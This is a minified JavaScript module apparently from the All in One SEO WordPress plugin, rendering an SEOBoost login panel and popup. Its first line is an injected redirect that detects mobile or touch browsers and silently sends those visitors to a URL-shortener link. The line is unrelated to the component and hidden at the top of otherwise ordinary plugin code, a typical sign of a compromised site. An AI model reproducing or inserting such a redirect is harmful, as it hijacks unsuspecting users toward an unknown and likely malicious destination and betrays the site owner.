(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as v}from"./Button.3cec2279.js";import{S as A}from"./Caret.aae02d8a.js";import{ao as I,ap as k,X as w}from"./app-core.c8323d51.js";import{_ as a}from"./vendor-other.39e59221.js";import{w as x,f as r,i as u,O as L,j as l,v as t,ae as g,U as c,M as p,a0 as O,R as E,Q as U,P as W}from"./vendor-vue-ui.232c7c36.js";const C=""+window.__aioseoDynamicImportPreload__("svg/login.526bfa16.svg"),N=""+window.__aioseoDynamicImportPreload__("svg/icon-logo.9cba25ef.svg"),T=["src"],P={class:"aioseo-seoboost-login__title"},V={class:"aioseo-seoboost-login__description"},z=["src"],M={__name:"Seoboost",props:{buttonOnly:{type:Boolean,default:!1},buttonText:String,buttonType:{type:String,default:"blue"},buttonIcons:{type:Boolean,default:!0},openLogin:{type:Boolean,default:!1}},setup(b){const e="all-in-one-seo-pack",d=I(),_=k(),s={title:a("Elevate your SEO with AIOSEO Writing Assistant",e),title2:a("Now Integrated into SEOBoost",e),description:a("Experience the power of AI-driven writing assistance seamlessly integrated into SEOBoost. Login to enhance your content creation process and boost your search rankings.",e),login:a("Login to SEOBoost",e)},o=b;x(()=>o.openLogin,i=>{i&&m()});const m=()=>{const i=d.seoBoost.loginUrl||_.seoBoost.loginUrl,n=450,f=580,h=window.innerWidth/2-n/2,S=window.innerHeight/2-f/2,B=`width=${n},height=${f},resizable=no,scrollbars=no,status=no,location=no,toolbar=no,menubar=no`;window.open(i,"_blank",B).moveBy(h,S),window.addEventListener("message",y=>{y.origin===window.location.origin&&y.data==="seoboost-authenticated"&&(d.setUserLoggedIn(!0),_.setUserLoggedIn(!0))})};return(i,n)=>(r(),u("div",{class:W(["aioseo-seoboost-login",{"aioseo-seoboost-login--button-only":o.buttonOnly}])},[o.buttonOnly?p("",!0):(r(),u(L,{key:0},[l("img",{src:t(w)(t(C))},null,8,T),l("div",P,[g(c(s.title)+" ",1),n[0]||(n[0]=l("br",null,null,-1)),g(" "+c(s.title2),1)]),l("div",V,c(s.description),1)],64)),O(t(v),{type:o.buttonType,onClick:m,size:"medium"},{default:E(()=>[o.buttonIcons?(r(),u("img",{key:0,src:t(w)(t(N))},null,8,z)):p("",!0),g(" "+c(o.buttonText||s.login)+" ",1),o.buttonIcons?(r(),U(t(A),{key:1})):p("",!0)]),_:1},8,["type"])],2))}};export{M as _};
